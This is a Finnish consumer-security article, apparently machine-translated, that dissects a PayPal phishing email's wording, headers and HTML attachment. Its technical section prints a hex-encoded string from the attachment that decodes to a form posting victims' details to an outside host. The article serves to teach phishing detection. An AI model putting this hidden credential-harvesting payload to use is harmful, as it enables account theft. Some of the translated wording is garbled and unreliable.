Älä usko, että vain pankkisi tiedot ovat tärkeitä: loppujen lopuksi, jos joku voi hallita tiliisi kirjautumista, he eivät vain tiedä kyseisen tilin tietoja, mutta kertoimet ovat, että samaa kirjautumistietoa voidaan käyttää useissa muissa tilejä. Ja jos he vaarantavat sähköpostitilin, he voivat nollata kaikki muut salasanasi.
Sen lisäksi, että säilytetään vahvoja ja vaihtelevia salasanoja, sinun on aina oltava etsimässä väärennetyt sähköpostit, jotka masquerading todellisena. Vaikka useimmat tietojenkalasteluyritykset ovat amatöörimäisiä, jotkut ovat varsin vakuuttavia, joten on tärkeää ymmärtää, miten tunnistaa ne pinta-alalla ja miten ne toimivat hupparin alla.
Kuva asirap
Tutkitaan mitä tavallisella näkökulmalla
Esimerkkisähköpostimme, kuten useimmat tietojenkalasteluyritykset, "ilmoittavat" sinulle PayPal-tilisi toiminnasta, joka normaaleissa olosuhteissa olisi hälyttävä. Joten toimintapyyntö on tarkistaa / palauttaa tilisi lähettämällä lähes kaikki henkilökohtaiset tiedot, joista voit ajatella. Jälleen tämä on melko kaavaa.
Vaikka varmasti on poikkeuksia, melkein kaikki tietojenkalastelu- ja huijaussähköpostit ovat täynnä punaisia lippuja suoraan viestissä. Vaikka teksti onkin vakuuttava, voit yleensä löytää monia virheitä, jotka ovat täynnä viestirunkoa, mikä osoittaa, että viesti ei ole legitiä.
Viesti-elin
- "Paypal" - Oikea tapaus on "PayPal" (pääoma P). Näet, että molempia muunnelmia käytetään viestissä. Yritykset ovat hyvin tietoisia brändiään, joten on epävarmaa, että jotain tällaista antaisi läpäisemisen.
- "Sallikaa ActiveX" - Kuinka monta kertaa olet nähnyt PayPalin kokoisen legit-verkkopohjaisen liiketoiminnan, joka käyttää vain yhtä selainta, varsinkin kun he tukevat useita selaimia? Toki, jonnekin siellä yritys tekee sen, mutta tämä on punainen lippu.
- "Turvallisesti". - Huomaa, kuinka tämä sana ei ole reunustamassa muiden kappaleen tekstin kanssa. Vaikka venytin ikkunan hieman, se ei kääri tai tilaa oikein.
- "Paypal!" - Huudahdinta edeltävä tila näyttää hankalalta. Ainoa huijaus, josta olen varma, ei tule olemaan legit-sähköpostissa.
- "PayPal-tilin päivitysmuoto.pdf.htm" - Miksi Paypal liittää "PDF" erityisesti silloin, kun ne voisivat vain linkittää sivun sivustoonsa? Lisäksi, miksi he yrittävät peittää HTML-tiedoston PDF: ksi? Tämä on kaikkien näiden kaikkien maiden suurin puna-lippu.
Viestin otsikko
- Osoitteesta osoitteesta [email protected].
- Osoitteeseen puuttuu. En tyhjennyt tätä, se ei yksinkertaisesti ole osa standardiviestiotsikkoa. Tyypillisesti yritys, jolla on nimesi, mukauttaa sähköpostin sinulle.
Liite
Kun avaat liitetiedoston, näet heti, että ulkoasu ei ole oikea, koska tyylitiedot puuttuvat. Jälleen, miksi PayPal lähetti HTML-lomakkeen, kun he voisivat yksinkertaisesti antaa sinulle linkin omalla sivustollaan?
Huomautus: käytimme Gmailin sisäänrakennettua HTML-liitteiden katselulaitetta, mutta suosittelemme, että et avaa liitetiedostoja huijareilta. Ei koskaan. Koskaan. He usein sisältävät hyökkäyksiä, jotka asentavat troijalaisia tietokoneellesi varastaaksesi tilitietosi.
Tekninen erittely
Vaikka sen pitäisi olla melko selvää sen perusteella, mikä on selväksi, että tämä on tietojenkalastelupyrkimys, aion nyt murtaa sähköpostin tekninen koostumus ja nähdä, mitä löydämme.
Liitteen tiedot
Ensimmäinen asia tarkastella on liitetiedoston HTML-lähde, joka toimittaa tiedot vääräksi sivustolle.
Kun lähdettä tarkastellaan nopeasti, kaikki linkit näyttävät päteviä, koska ne osoittavat joko "paypal.com" tai "paypalobjects.com", jotka ovat molemmat legit.
Tiedot sähköpostin otsikoista
Seuraavaksi tarkastelemme raakaa sähköpostiviestien otsikoita. Gmail tekee tämän saatavalla viestin Näytä alkuperäisen valikkovaihtoehdon kautta.
Missä tiedot siirtyvät?
Joten olemme selvästi määrittäneet, että kyseessä on tietojenkalastelusähköposti ja kerätty tietoja siitä, mistä viesti on peräisin, mutta entä missä tietoja lähetetään?
Nähdäksesi tämän, meidän on ensin tallennettava HTM-liite työpöydälle ja avattava tekstieditorissa. Selaa läpi, kaikki näyttää olevan kunnossa paitsi, kun saamme epäilyttävän näköisen JavaScript-lohkon.
Aina kun näet suuren sekasorvan merkkijonoon näennäisesti satunnaisia kirjaimia ja numeroita, jotka on upotettu Javascript-lohkoon, se on yleensä epäilyttävää. Tarkasteltaessa koodia muuttuja "x" asetetaan tähän suureen merkkijonoon ja dekoodataan sitten muuttujalle "y". Muuttujan "y" lopullinen tulos kirjoitetaan sitten asiakirjaan HTML: ksi.
Koska suuri merkkijono on numerot 0-9 ja kirjaimet a-f, se todennäköisesti koodataan yksinkertaisen ASCII-Hex-muuntamisen kautta:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Kääntää:
Ei ole sattumaa, että tämä dekoodataan kelvolliseksi HTML-lomakekoodiksi, joka lähettää tulokset ei PayPaliin vaan roistovalikkoon.
Lisäksi, kun tarkastelet lomakkeen HTML-lähdettä, näet, että tämä lomakekoodi ei ole näkyvissä, koska se luodaan dynaamisesti Javascriptin kautta. Tämä on älykäs tapa piilottaa, mitä HTML todella tekee, jos joku näkisi vain luotu liitetiedoston lähdekoodin (kuten aikaisemminkin), toisin kuin liitetiedoston avaaminen suoraan tekstieditorissa.
Kyynisyys on hyvä puolustus
Kun on kyse turvallisesta verkosta pysymisestä, se ei koskaan sattuu olemaan kyynisyyttä.
Vaikka olen varma, että esimerkkiviestissä on enemmän punaisia lippuja, olemme maininneet edellä osoitetut indikaattorit vain muutaman minuutin tutkimisen jälkeen. Hypoteettisesti, jos sähköpostin pinnan taso jäljitteli oikean vastapuolensa 100%, tekninen analyysi paljastaisi edelleen sen todellisen luonteen. Siksi tuonti on mahdollista tutkia sekä mitä voit että ei voi nähdä.
